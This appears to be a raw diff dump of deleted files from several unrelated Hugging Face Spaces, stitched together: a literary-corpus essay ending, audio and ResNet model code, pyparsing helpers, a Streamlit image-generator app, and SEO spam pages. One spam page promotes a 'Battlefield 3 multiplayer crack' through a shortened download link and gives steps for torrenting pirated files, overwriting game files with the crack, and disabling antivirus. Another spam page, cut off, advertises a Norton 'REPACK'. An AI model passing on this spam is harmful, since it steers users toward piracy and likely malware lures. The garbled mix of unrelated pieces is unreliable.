    In a way, this is the largest resource available in which many of these measurements can be made. Another characteristic of ELTeC is that parts of it are not meant to be released, which means they cannot be downloaded by other researchers. We hope that this will nevertheless allow more high-quality applications to be developed.

    -

    In conclusion, we hope that we will continue to see ELTeC grow and improve over the years. We hope to continuously add further examples of literary corpora from national and regional traditions in Europe. We would also like to make this corpus more accessible to researchers by allowing users to download non-free datasets. We would also like to increase the interoperability of ELTeC with other corpora.

    -

    -
    -
    \ No newline at end of file diff --git a/spaces/r3gm/Ultimate-Vocal-Remover-WebUI/demucs/spec.py b/spaces/r3gm/Ultimate-Vocal-Remover-WebUI/demucs/spec.py deleted file mode 100644 index 85e5dc9397df4466f4191f440bed8edf5bf01663..0000000000000000000000000000000000000000 --- a/spaces/r3gm/Ultimate-Vocal-Remover-WebUI/demucs/spec.py +++ /dev/null @@ -1,41 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. -"""Conveniance wrapper to perform STFT and iSTFT""" - -import torch as th - - -def spectro(x, n_fft=512, hop_length=None, pad=0): - *other, length = x.shape - x = x.reshape(-1, length) - z = th.stft(x, - n_fft * (1 + pad), - hop_length or n_fft // 4, - window=th.hann_window(n_fft).to(x), - win_length=n_fft, - normalized=True, - center=True, - return_complex=True, - pad_mode='reflect') - _, freqs, frame = z.shape - return z.view(*other, freqs, frame) - - -def ispectro(z, hop_length=None, length=None, pad=0): - *other, freqs, frames = z.shape - n_fft = 2 * freqs - 2 - z = z.view(-1, freqs, frames) - win_length = n_fft // (1 + pad) - x = th.istft(z, - n_fft, - hop_length, - window=th.hann_window(win_length).to(z.real), - win_length=win_length, - normalized=True, - length=length, - center=True) - _, length = x.shape - return x.view(*other, length) diff --git a/spaces/rachana219/MODT2/trackers/strongsort/deep/models/resnet_ibn_a.py b/spaces/rachana219/MODT2/trackers/strongsort/deep/models/resnet_ibn_a.py deleted file mode 100644 index d198e7c9e361c40d25bc7eb1f352b971596ee124..0000000000000000000000000000000000000000 --- a/spaces/rachana219/MODT2/trackers/strongsort/deep/models/resnet_ibn_a.py +++ /dev/null @@ -1,289 +0,0 @@ -""" -Credit to https://github.com/XingangPan/IBN-Net. 
-""" -from __future__ import division, absolute_import -import math -import torch -import torch.nn as nn -import torch.utils.model_zoo as model_zoo - -__all__ = ['resnet50_ibn_a'] - -model_urls = { - 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth', - 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth', - 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth', -} - - -def conv3x3(in_planes, out_planes, stride=1): - "3x3 convolution with padding" - return nn.Conv2d( - in_planes, - out_planes, - kernel_size=3, - stride=stride, - padding=1, - bias=False - ) - - -class BasicBlock(nn.Module): - expansion = 1 - - def __init__(self, inplanes, planes, stride=1, downsample=None): - super(BasicBlock, self).__init__() - self.conv1 = conv3x3(inplanes, planes, stride) - self.bn1 = nn.BatchNorm2d(planes) - self.relu = nn.ReLU(inplace=True) - self.conv2 = conv3x3(planes, planes) - self.bn2 = nn.BatchNorm2d(planes) - self.downsample = downsample - self.stride = stride - - def forward(self, x): - residual = x - - out = self.conv1(x) - out = self.bn1(out) - out = self.relu(out) - - out = self.conv2(out) - out = self.bn2(out) - - if self.downsample is not None: - residual = self.downsample(x) - - out += residual - out = self.relu(out) - - return out - - -class IBN(nn.Module): - - def __init__(self, planes): - super(IBN, self).__init__() - half1 = int(planes / 2) - self.half = half1 - half2 = planes - half1 - self.IN = nn.InstanceNorm2d(half1, affine=True) - self.BN = nn.BatchNorm2d(half2) - - def forward(self, x): - split = torch.split(x, self.half, 1) - out1 = self.IN(split[0].contiguous()) - out2 = self.BN(split[1].contiguous()) - out = torch.cat((out1, out2), 1) - return out - - -class Bottleneck(nn.Module): - expansion = 4 - - def __init__(self, inplanes, planes, ibn=False, stride=1, downsample=None): - super(Bottleneck, self).__init__() - self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False) - if ibn: 
- self.bn1 = IBN(planes) - else: - self.bn1 = nn.BatchNorm2d(planes) - self.conv2 = nn.Conv2d( - planes, - planes, - kernel_size=3, - stride=stride, - padding=1, - bias=False - ) - self.bn2 = nn.BatchNorm2d(planes) - self.conv3 = nn.Conv2d( - planes, planes * self.expansion, kernel_size=1, bias=False - ) - self.bn3 = nn.BatchNorm2d(planes * self.expansion) - self.relu = nn.ReLU(inplace=True) - self.downsample = downsample - self.stride = stride - - def forward(self, x): - residual = x - - out = self.conv1(x) - out = self.bn1(out) - out = self.relu(out) - - out = self.conv2(out) - out = self.bn2(out) - out = self.relu(out) - - out = self.conv3(out) - out = self.bn3(out) - - if self.downsample is not None: - residual = self.downsample(x) - - out += residual - out = self.relu(out) - - return out - - -class ResNet(nn.Module): - """Residual network + IBN layer. - - Reference: - - He et al. Deep Residual Learning for Image Recognition. CVPR 2016. - - Pan et al. Two at Once: Enhancing Learning and Generalization - Capacities via IBN-Net. ECCV 2018. 
- """ - - def __init__( - self, - block, - layers, - num_classes=1000, - loss='softmax', - fc_dims=None, - dropout_p=None, - **kwargs - ): - scale = 64 - self.inplanes = scale - super(ResNet, self).__init__() - self.loss = loss - self.feature_dim = scale * 8 * block.expansion - - self.conv1 = nn.Conv2d( - 3, scale, kernel_size=7, stride=2, padding=3, bias=False - ) - self.bn1 = nn.BatchNorm2d(scale) - self.relu = nn.ReLU(inplace=True) - self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) - self.layer1 = self._make_layer(block, scale, layers[0]) - self.layer2 = self._make_layer(block, scale * 2, layers[1], stride=2) - self.layer3 = self._make_layer(block, scale * 4, layers[2], stride=2) - self.layer4 = self._make_layer(block, scale * 8, layers[3], stride=2) - self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) - self.fc = self._construct_fc_layer( - fc_dims, scale * 8 * block.expansion, dropout_p - ) - self.classifier = nn.Linear(self.feature_dim, num_classes) - - for m in self.modules(): - if isinstance(m, nn.Conv2d): - n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels - m.weight.data.normal_(0, math.sqrt(2. 
/ n)) - elif isinstance(m, nn.BatchNorm2d): - m.weight.data.fill_(1) - m.bias.data.zero_() - elif isinstance(m, nn.InstanceNorm2d): - m.weight.data.fill_(1) - m.bias.data.zero_() - - def _make_layer(self, block, planes, blocks, stride=1): - downsample = None - if stride != 1 or self.inplanes != planes * block.expansion: - downsample = nn.Sequential( - nn.Conv2d( - self.inplanes, - planes * block.expansion, - kernel_size=1, - stride=stride, - bias=False - ), - nn.BatchNorm2d(planes * block.expansion), - ) - - layers = [] - ibn = True - if planes == 512: - ibn = False - layers.append(block(self.inplanes, planes, ibn, stride, downsample)) - self.inplanes = planes * block.expansion - for i in range(1, blocks): - layers.append(block(self.inplanes, planes, ibn)) - - return nn.Sequential(*layers) - - def _construct_fc_layer(self, fc_dims, input_dim, dropout_p=None): - """Constructs fully connected layer - - Args: - fc_dims (list or tuple): dimensions of fc layers, if None, no fc layers are constructed - input_dim (int): input dimension - dropout_p (float): dropout probability, if None, dropout is unused - """ - if fc_dims is None: - self.feature_dim = input_dim - return None - - assert isinstance( - fc_dims, (list, tuple) - ), 'fc_dims must be either list or tuple, but got {}'.format( - type(fc_dims) - ) - - layers = [] - for dim in fc_dims: - layers.append(nn.Linear(input_dim, dim)) - layers.append(nn.BatchNorm1d(dim)) - layers.append(nn.ReLU(inplace=True)) - if dropout_p is not None: - layers.append(nn.Dropout(p=dropout_p)) - input_dim = dim - - self.feature_dim = fc_dims[-1] - - return nn.Sequential(*layers) - - def featuremaps(self, x): - x = self.conv1(x) - x = self.bn1(x) - x = self.relu(x) - x = self.maxpool(x) - x = self.layer1(x) - x = self.layer2(x) - x = self.layer3(x) - x = self.layer4(x) - return x - - def forward(self, x): - f = self.featuremaps(x) - v = self.avgpool(f) - v = v.view(v.size(0), -1) - if self.fc is not None: - v = self.fc(v) - if not 
self.training: - return v - y = self.classifier(v) - if self.loss == 'softmax': - return y - elif self.loss == 'triplet': - return y, v - else: - raise KeyError("Unsupported loss: {}".format(self.loss)) - - -def init_pretrained_weights(model, model_url): - """Initializes model with pretrained weights. - - Layers that don't match with pretrained layers in name or size are kept unchanged. - """ - pretrain_dict = model_zoo.load_url(model_url) - model_dict = model.state_dict() - pretrain_dict = { - k: v - for k, v in pretrain_dict.items() - if k in model_dict and model_dict[k].size() == v.size() - } - model_dict.update(pretrain_dict) - model.load_state_dict(model_dict) - - -def resnet50_ibn_a(num_classes, loss='softmax', pretrained=False, **kwargs): - model = ResNet( - Bottleneck, [3, 4, 6, 3], num_classes=num_classes, loss=loss, **kwargs - ) - if pretrained: - init_pretrained_weights(model, model_urls['resnet50']) - return model diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Battlefield 3 Multiplayer Crack Reloaded Free Download A Simple and Effective Solution.md b/spaces/raedeXanto/academic-chatgpt-beta/Battlefield 3 Multiplayer Crack Reloaded Free Download A Simple and Effective Solution.md deleted file mode 100644 index 5d1c6f43c7731756a8195f8b13f6477a8b15a60a..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Battlefield 3 Multiplayer Crack Reloaded Free Download A Simple and Effective Solution.md +++ /dev/null @@ -1,104 +0,0 @@ - -

    Battlefield 3 Multiplayer Crack Reloaded Free Download

    -

    If you are a fan of first-person shooter games, you might have heard of Battlefield 3, one of the most popular and acclaimed titles in the genre. But did you know that you can play it online with other players for free? In this article, we will show you how to download Battlefield 3 multiplayer crack reloaded for free, and give you some tips and tricks for playing the game online.

    -

    battlefield 3 multiplayer crack reloaded free download


    Download File ►►►►► https://tinourl.com/2uL18r



    -

    Introduction

    -

    Before we get into the details of how to download and install the multiplayer crack, let's first understand what Battlefield 3 is, what multiplayer crack reloaded is, and why you might want to download it for free.

    -

    What is Battlefield 3?

    -

    Battlefield 3 is a first-person shooter game developed by EA DICE and published by Electronic Arts in 2011. It is the third main installment in the Battlefield series, and the sequel to Battlefield 2. The game features both a single-player campaign and a multiplayer mode, where players can compete in various modes and maps with up to 64 players on PC, or 24 players on consoles.

    -

    What is multiplayer crack reloaded?

    -

    Multiplayer crack reloaded is a modified version of the game that allows players to bypass the official servers and play online with other players who have the same crack. This means that you don't need to buy the game or have an Origin account to play online. You just need to download the game files and the crack files, and install them on your PC.

    -

    Why would you want to download it for free?

    -

    There are several reasons why you might want to download Battlefield 3 multiplayer crack reloaded for free. Some of them are:

    -
      -
    • You want to try the game before buying it.
    • -
    • You can't afford to buy the game or don't have access to it in your region.
    • -
    • You don't want to deal with Origin or EA's DRM (digital rights management) system.
    • -
    • You want to play with your friends who have the same crack.
    • -
    • You want to experience a different version of the game with custom servers, mods, and hacks.
    • -
    -

    However, keep in mind that downloading and playing Battlefield 3 multiplayer crack reloaded for free is illegal and unethical. You are violating EA's terms of service and copyright laws. You are also risking your PC's security and performance by downloading files from unknown sources. You might encounter viruses, malware, bugs, glitches, crashes, or bans. You are also missing out on some features and updates that are only available on the official servers. Therefore, we do not endorse or recommend downloading or playing Battlefield 3 multiplayer crack reloaded for free. This article is for educational purposes only.

    -

    -

    How to download Battlefield 3 multiplayer crack reloaded for free

    -

    If you still want to download Battlefield 3 multiplayer crack reloaded for free, here are the steps you need to follow:

    -

    Step 1: Find a reliable source

    -

    The first step is to find a reliable source where you can download the game files and the crack files. There are many websites and torrents that claim to offer these files, but not all of them are trustworthy or safe. You need to do some research and check the reviews, ratings, comments, and feedback from other users before downloading anything. You also need to make sure that the files are compatible with your PC's specifications and operating system.

    -

    Step 2: Download the files

    -

    The second step is to download the files from your chosen source. You will need a torrent client such as uTorrent or BitTorrent to download the torrent files. You will also need a file extractor such as WinRAR or 7-Zip to extract the compressed files. The size of the files might vary depending on your source, but usually they are around 10 GB for the game files and around 100 MB for the crack files.

    -

    Step 3: Install the game and the crack

    The third step is to install the game and the crack. To install the game, run the installer from the extracted game folder and follow the instructions. To install the crack, copy all the files from the extracted crack folder into the game folder, replacing the original files. You might need to disable your antivirus or firewall temporarily to avoid any interference.

    -

    Step 4: Enjoy the multiplayer mode

    -

    The fourth and final step is to enjoy the multiplayer mode of Battlefield 3. To play online, you need to run the bf3.exe file from the game folder and select the multiplayer option. You will see a list of servers that are running the multiplayer crack reloaded. You can join any server that has players and matches your preferences. You can also create your own server and invite your friends who have the same crack.

    -

    Tips and tricks for playing Battlefield 3 multiplayer mode

    -

    Now that you have downloaded and installed Battlefield 3 multiplayer crack reloaded for free, you might want to know some tips and tricks for playing the game online. Here are some of them:

    -

    Choose your class wisely

    -

    Battlefield 3 has four classes that you can choose from: Assault, Engineer, Support, and Recon. Each class has its own strengths, weaknesses, and roles in the battlefield. You should choose a class that suits your playstyle and complements your team. For example, if you like to heal and revive your teammates, you should choose Assault. If you like to repair and destroy vehicles, you should choose Engineer. If you like to provide ammo and suppressive fire, you should choose Support. If you like to snipe and spot enemies, you should choose Recon.

    -

    Use teamwork and communication

    -

    Battlefield 3 is a team-based game that requires teamwork and communication to win. You should always work with your squad and your team, and use the in-game chat or voice chat to coordinate your actions. You should also follow the orders of your squad leader and your commander, and help them achieve their objectives. You should also share your resources and information with your teammates, such as ammo, health, vehicles, enemies, etc.

    -

    Customize your weapons and gadgets

    -

    Battlefield 3 has a wide variety of weapons and gadgets that you can use in the multiplayer mode. You can unlock new weapons and gadgets by leveling up your class and completing assignments. You can also customize your weapons and gadgets by attaching different accessories and attachments, such as scopes, silencers, grips, lasers, etc. You should experiment with different combinations and find what works best for you.

    -

    Learn the maps and modes

    -

    Battlefield 3 has many maps and modes that you can play in the multiplayer mode. Each map has its own layout, terrain, weather, vehicles, etc. Each mode has its own rules, objectives, time limit, etc. You should learn the maps and modes by playing them often and studying their features. You should also adapt your strategy and tactics according to the map and mode you are playing.

    -

    Conclusion

    -

    Battlefield 3 is a great game that offers a thrilling and immersive multiplayer experience. However, if you want to play it online for free, you need to download Battlefield 3 multiplayer crack reloaded for free. This is a risky and illegal way of playing the game that might cause you some problems. Therefore, we advise you to buy the game legally or play it offline instead. We hope this article was helpful for you.

    -

    FAQs

    -
      -
    • Q: Is Battlefield 3 multiplayer crack reloaded safe?
    • -
    • A: No, it is not safe. You are downloading files from unknown sources that might contain viruses or malware. You are also violating EA's terms of service and copyright laws.
    • -
    • Q: Is Battlefield 3 multiplayer crack reloaded updated?
    • -
    • A: No, it is not updated. You are playing an outdated version of the game that does not have the latest features and updates that are available on the official servers.
    • -
    • Q: Is Battlefield 3 multiplayer crack reloaded fun?
    • -
    • A: Yes, it can be fun. You can play online with other players who have the same crack. You can also experience a different version of the game with custom servers, mods, and hacks.
    • -
    • Q: How can I buy Battlefield 3 legally?
    • -
    • A: You can buy Battlefield 3 legally from EA's website or Origin's platform. You can also buy it from other online or offline retailers.
    • -
    • Q: How can I play Battlefield 3 offline?
    • -
    • A: You can play Battlefield 3 offline by selecting the single-player option from the main menu. You can also play some co-op missions with a friend online or offline.
    • -
    -

    -
    -
    \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Download Norton Antivirus REPACK Free Trial For 60 Days.md b/spaces/raedeXanto/academic-chatgpt-beta/Download Norton Antivirus REPACK Free Trial For 60 Days.md deleted file mode 100644 index b3d6162e6797ee491e55963a4d8cd29fc3f98e12..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Download Norton Antivirus REPACK Free Trial For 60 Days.md +++ /dev/null @@ -1,91 +0,0 @@ -
    - - -' - # make_html_tags returns pyparsing expressions for the opening and - # closing tags as a 2-tuple - a, a_end = make_html_tags("A") - link_expr = a + SkipTo(a_end)("link_text") + a_end - - for link in link_expr.search_string(text): - # attributes in the tag (like "href" shown here) are - # also accessible as named results - print(link.link_text, '->', link.href) - - prints:: - - pyparsing -> https://github.com/pyparsing/pyparsing/wiki - """ - return _makeTags(tag_str, False) - - -def make_xml_tags( - tag_str: Union[str, ParserElement] -) -> Tuple[ParserElement, ParserElement]: - """Helper to construct opening and closing tag expressions for XML, - given a tag name. Matches tags only in the given upper/lower case. - - Example: similar to :class:`make_html_tags` - """ - return _makeTags(tag_str, True) - - -any_open_tag, any_close_tag = make_html_tags( - Word(alphas, alphanums + "_:").set_name("any tag") -) - -_htmlEntityMap = {k.rstrip(";"): v for k, v in html.entities.html5.items()} -common_html_entity = Regex("&(?P" + "|".join(_htmlEntityMap) + ");").set_name( - "common HTML entity" -) - - -def replace_html_entity(t): - """Helper parser action to replace common HTML entities with their special characters""" - return _htmlEntityMap.get(t.entity) - - -class OpAssoc(Enum): - LEFT = 1 - RIGHT = 2 - - -InfixNotationOperatorArgType = Union[ - ParserElement, str, Tuple[Union[ParserElement, str], Union[ParserElement, str]] -] -InfixNotationOperatorSpec = Union[ - Tuple[ - InfixNotationOperatorArgType, - int, - OpAssoc, - OptionalType[ParseAction], - ], - Tuple[ - InfixNotationOperatorArgType, - int, - OpAssoc, - ], -] - - -def infix_notation( - base_expr: ParserElement, - op_list: List[InfixNotationOperatorSpec], - lpar: Union[str, ParserElement] = Suppress("("), - rpar: Union[str, ParserElement] = Suppress(")"), -) -> ParserElement: - """Helper method for constructing grammars of expressions made up of - operators working in a precedence hierarchy. 
Operators may be unary - or binary, left- or right-associative. Parse actions can also be - attached to operator expressions. The generated parser will also - recognize the use of parentheses to override operator precedences - (see example below). - - Note: if you define a deep operator list, you may see performance - issues when using infix_notation. See - :class:`ParserElement.enable_packrat` for a mechanism to potentially - improve your parser performance. - - Parameters: - - ``base_expr`` - expression representing the most basic operand to - be used in the expression - - ``op_list`` - list of tuples, one for each operator precedence level - in the expression grammar; each tuple is of the form ``(op_expr, - num_operands, right_left_assoc, (optional)parse_action)``, where: - - - ``op_expr`` is the pyparsing expression for the operator; may also - be a string, which will be converted to a Literal; if ``num_operands`` - is 3, ``op_expr`` is a tuple of two expressions, for the two - operators separating the 3 terms - - ``num_operands`` is the number of terms for this operator (must be 1, - 2, or 3) - - ``right_left_assoc`` is the indicator whether the operator is right - or left associative, using the pyparsing-defined constants - ``OpAssoc.RIGHT`` and ``OpAssoc.LEFT``. - - ``parse_action`` is the parse action to be associated with - expressions matching this operator expression (the parse action - tuple member may be omitted); if the parse action is passed - a tuple or list of functions, this is equivalent to calling - ``set_parse_action(*fn)`` - (:class:`ParserElement.set_parse_action`) - - ``lpar`` - expression for matching left-parentheses; if passed as a - str, then will be parsed as Suppress(lpar). If lpar is passed as - an expression (such as ``Literal('(')``), then it will be kept in - the parsed results, and grouped with them. 
(default= ``Suppress('(')``) - - ``rpar`` - expression for matching right-parentheses; if passed as a - str, then will be parsed as Suppress(rpar). If rpar is passed as - an expression (such as ``Literal(')')``), then it will be kept in - the parsed results, and grouped with them. (default= ``Suppress(')')``) - - Example:: - - # simple example of four-function arithmetic with ints and - # variable names - integer = pyparsing_common.signed_integer - varname = pyparsing_common.identifier - - arith_expr = infix_notation(integer | varname, - [ - ('-', 1, OpAssoc.RIGHT), - (one_of('* /'), 2, OpAssoc.LEFT), - (one_of('+ -'), 2, OpAssoc.LEFT), - ]) - - arith_expr.run_tests(''' - 5+3*6 - (5+3)*6 - -2--11 - ''', full_dump=False) - - prints:: - - 5+3*6 - [[5, '+', [3, '*', 6]]] - - (5+3)*6 - [[[5, '+', 3], '*', 6]] - - -2--11 - [[['-', 2], '-', ['-', 11]]] - """ - # captive version of FollowedBy that does not do parse actions or capture results names - class _FB(FollowedBy): - def parseImpl(self, instring, loc, doActions=True): - self.expr.try_parse(instring, loc) - return loc, [] - - _FB.__name__ = "FollowedBy>" - - ret = Forward() - if isinstance(lpar, str): - lpar = Suppress(lpar) - if isinstance(rpar, str): - rpar = Suppress(rpar) - - # if lpar and rpar are not suppressed, wrap in group - if not (isinstance(rpar, Suppress) and isinstance(rpar, Suppress)): - lastExpr = base_expr | Group(lpar + ret + rpar) - else: - lastExpr = base_expr | (lpar + ret + rpar) - - for i, operDef in enumerate(op_list): - opExpr, arity, rightLeftAssoc, pa = (operDef + (None,))[:4] - if isinstance(opExpr, str_type): - opExpr = ParserElement._literalStringClass(opExpr) - if arity == 3: - if not isinstance(opExpr, (tuple, list)) or len(opExpr) != 2: - raise ValueError( - "if numterms=3, opExpr must be a tuple or list of two expressions" - ) - opExpr1, opExpr2 = opExpr - term_name = "{}{} term".format(opExpr1, opExpr2) - else: - term_name = "{} term".format(opExpr) - - if not 1 <= arity <= 3: - 
raise ValueError("operator must be unary (1), binary (2), or ternary (3)") - - if rightLeftAssoc not in (OpAssoc.LEFT, OpAssoc.RIGHT): - raise ValueError("operator must indicate right or left associativity") - - thisExpr = Forward().set_name(term_name) - if rightLeftAssoc is OpAssoc.LEFT: - if arity == 1: - matchExpr = _FB(lastExpr + opExpr) + Group(lastExpr + opExpr[1, ...]) - elif arity == 2: - if opExpr is not None: - matchExpr = _FB(lastExpr + opExpr + lastExpr) + Group( - lastExpr + (opExpr + lastExpr)[1, ...] - ) - else: - matchExpr = _FB(lastExpr + lastExpr) + Group(lastExpr[2, ...]) - elif arity == 3: - matchExpr = _FB( - lastExpr + opExpr1 + lastExpr + opExpr2 + lastExpr - ) + Group(lastExpr + OneOrMore(opExpr1 + lastExpr + opExpr2 + lastExpr)) - elif rightLeftAssoc is OpAssoc.RIGHT: - if arity == 1: - # try to avoid LR with this extra test - if not isinstance(opExpr, Opt): - opExpr = Opt(opExpr) - matchExpr = _FB(opExpr.expr + thisExpr) + Group(opExpr + thisExpr) - elif arity == 2: - if opExpr is not None: - matchExpr = _FB(lastExpr + opExpr + thisExpr) + Group( - lastExpr + (opExpr + thisExpr)[1, ...] - ) - else: - matchExpr = _FB(lastExpr + thisExpr) + Group( - lastExpr + thisExpr[1, ...] - ) - elif arity == 3: - matchExpr = _FB( - lastExpr + opExpr1 + thisExpr + opExpr2 + thisExpr - ) + Group(lastExpr + opExpr1 + thisExpr + opExpr2 + thisExpr) - if pa: - if isinstance(pa, (tuple, list)): - matchExpr.set_parse_action(*pa) - else: - matchExpr.set_parse_action(pa) - thisExpr <<= (matchExpr | lastExpr).setName(term_name) - lastExpr = thisExpr - ret <<= lastExpr - return ret - - -def indentedBlock(blockStatementExpr, indentStack, indent=True, backup_stacks=[]): - """ - (DEPRECATED - use IndentedBlock class instead) - Helper method for defining space-delimited indentation blocks, - such as those used to define block statements in Python source code. 
- - Parameters: - - - ``blockStatementExpr`` - expression defining syntax of statement that - is repeated within the indented block - - ``indentStack`` - list created by caller to manage indentation stack - (multiple ``statementWithIndentedBlock`` expressions within a single - grammar should share a common ``indentStack``) - - ``indent`` - boolean indicating whether block must be indented beyond - the current level; set to ``False`` for block of left-most statements - (default= ``True``) - - A valid block must contain at least one ``blockStatement``. - - (Note that indentedBlock uses internal parse actions which make it - incompatible with packrat parsing.) - - Example:: - - data = ''' - def A(z): - A1 - B = 100 - G = A2 - A2 - A3 - B - def BB(a,b,c): - BB1 - def BBA(): - bba1 - bba2 - bba3 - C - D - def spam(x,y): - def eggs(z): - pass - ''' - - - indentStack = [1] - stmt = Forward() - - identifier = Word(alphas, alphanums) - funcDecl = ("def" + identifier + Group("(" + Opt(delimitedList(identifier)) + ")") + ":") - func_body = indentedBlock(stmt, indentStack) - funcDef = Group(funcDecl + func_body) - - rvalue = Forward() - funcCall = Group(identifier + "(" + Opt(delimitedList(rvalue)) + ")") - rvalue << (funcCall | identifier | Word(nums)) - assignment = Group(identifier + "=" + rvalue) - stmt << (funcDef | assignment | identifier) - - module_body = OneOrMore(stmt) - - parseTree = module_body.parseString(data) - parseTree.pprint() - - prints:: - - [['def', - 'A', - ['(', 'z', ')'], - ':', - [['A1'], [['B', '=', '100']], [['G', '=', 'A2']], ['A2'], ['A3']]], - 'B', - ['def', - 'BB', - ['(', 'a', 'b', 'c', ')'], - ':', - [['BB1'], [['def', 'BBA', ['(', ')'], ':', [['bba1'], ['bba2'], ['bba3']]]]]], - 'C', - 'D', - ['def', - 'spam', - ['(', 'x', 'y', ')'], - ':', - [[['def', 'eggs', ['(', 'z', ')'], ':', [['pass']]]]]]] - """ - backup_stacks.append(indentStack[:]) - - def reset_stack(): - indentStack[:] = backup_stacks[-1] - - def checkPeerIndent(s, l, t): - if l >= 
len(s): - return - curCol = col(l, s) - if curCol != indentStack[-1]: - if curCol > indentStack[-1]: - raise ParseException(s, l, "illegal nesting") - raise ParseException(s, l, "not a peer entry") - - def checkSubIndent(s, l, t): - curCol = col(l, s) - if curCol > indentStack[-1]: - indentStack.append(curCol) - else: - raise ParseException(s, l, "not a subentry") - - def checkUnindent(s, l, t): - if l >= len(s): - return - curCol = col(l, s) - if not (indentStack and curCol in indentStack): - raise ParseException(s, l, "not an unindent") - if curCol < indentStack[-1]: - indentStack.pop() - - NL = OneOrMore(LineEnd().set_whitespace_chars("\t ").suppress()) - INDENT = (Empty() + Empty().set_parse_action(checkSubIndent)).set_name("INDENT") - PEER = Empty().set_parse_action(checkPeerIndent).set_name("") - UNDENT = Empty().set_parse_action(checkUnindent).set_name("UNINDENT") - if indent: - smExpr = Group( - Opt(NL) - + INDENT - + OneOrMore(PEER + Group(blockStatementExpr) + Opt(NL)) - + UNDENT - ) - else: - smExpr = Group( - Opt(NL) - + OneOrMore(PEER + Group(blockStatementExpr) + Opt(NL)) - + Opt(UNDENT) - ) - - # add a parse action to remove backup_stack from list of backups - smExpr.add_parse_action( - lambda: backup_stacks.pop(-1) and None if backup_stacks else None - ) - smExpr.set_fail_action(lambda a, b, c, d: reset_stack()) - blockStatementExpr.ignore(_bslash + LineEnd()) - return smExpr.set_name("indented block") - - -# it's easy to get these comment structures wrong - they're very common, so may as well make them available -c_style_comment = Combine(Regex(r"/\*(?:[^*]|\*(?!/))*") + "*/").set_name( - "C style comment" -) -"Comment of the form ``/* ... */``" - -html_comment = Regex(r"<!--[\s\S]*?-->").set_name("HTML comment") -"Comment of the form ``<!-- ... -->``" - -rest_of_line = Regex(r".*").leave_whitespace().set_name("rest of line") -dbl_slash_comment = Regex(r"//(?:\\\n|[^\n])*").set_name("// comment") -"Comment of the form ``// ... 
(to end of line)``" - -cpp_style_comment = Combine( - Regex(r"/\*(?:[^*]|\*(?!/))*") + "*/" | dbl_slash_comment -).set_name("C++ style comment") -"Comment of either form :class:`c_style_comment` or :class:`dbl_slash_comment`" - -java_style_comment = cpp_style_comment -"Same as :class:`cpp_style_comment`" - -python_style_comment = Regex(r"#.*").set_name("Python style comment") -"Comment of the form ``# ... (to end of line)``" - - -# build list of built-in expressions, for future reference if a global default value -# gets updated -_builtin_exprs = [v for v in vars().values() if isinstance(v, ParserElement)] - - -# pre-PEP8 compatible names -delimitedList = delimited_list -countedArray = counted_array -matchPreviousLiteral = match_previous_literal -matchPreviousExpr = match_previous_expr -oneOf = one_of -dictOf = dict_of -originalTextFor = original_text_for -nestedExpr = nested_expr -makeHTMLTags = make_html_tags -makeXMLTags = make_xml_tags -anyOpenTag, anyCloseTag = any_open_tag, any_close_tag -commonHTMLEntity = common_html_entity -replaceHTMLEntity = replace_html_entity -opAssoc = OpAssoc -infixNotation = infix_notation -cStyleComment = c_style_comment -htmlComment = html_comment -restOfLine = rest_of_line -dblSlashComment = dbl_slash_comment -cppStyleComment = cpp_style_comment -javaStyleComment = java_style_comment -pythonStyleComment = python_style_comment diff --git a/spaces/tom-doerr/logo_generator/app/streamlit/app.py b/spaces/tom-doerr/logo_generator/app/streamlit/app.py deleted file mode 100644 index 7af9f9bdc771af703b68600a7ed9afa7c8464921..0000000000000000000000000000000000000000 --- a/spaces/tom-doerr/logo_generator/app/streamlit/app.py +++ /dev/null @@ -1,110 +0,0 @@ -#!/usr/bin/env python -# coding: utf-8 - -from datetime import datetime - -import streamlit as st -from backend import ServiceError, get_images_from_backend, get_model_version - -st.sidebar.markdown( - """ - -

    - -

    -""", - unsafe_allow_html=True, -) -st.sidebar.markdown( - """ -___ -

    -DALL·E mini is an AI model that generates images from any prompt you give! -

    - -

    -Created by Boris Dayma et al. 2021-2022 -
    -
    GitHub | Project Report -

    - """, - unsafe_allow_html=True, -) - -st.header("DALL·E mini") -st.subheader("Generate images from text") - -prompt = st.text_input("What do you want to see?") - -DEBUG = False -if prompt != "": - container = st.empty() - container.markdown( - f""" - -
    -
    - -
    -
    - Predictions may take up to 5mn under high load. Please stand by. - """, - unsafe_allow_html=True, - ) - - try: - backend_url = st.secrets["BACKEND_SERVER"] + "/generate" - selected = get_images_from_backend(prompt, backend_url) - - margin = 0.1 # for better position of zoom in arrow - n_columns = 3 - cols = st.columns([1] + [margin, 1] * (n_columns - 1)) - for i, img in enumerate(selected): - cols[(i % n_columns) * 2].image(img) - container.markdown(f"**{prompt}**") - - version_url = st.secrets["BACKEND_SERVER"] + "/version" - version = get_model_version(version_url) - st.sidebar.markdown( - f"
    {version}
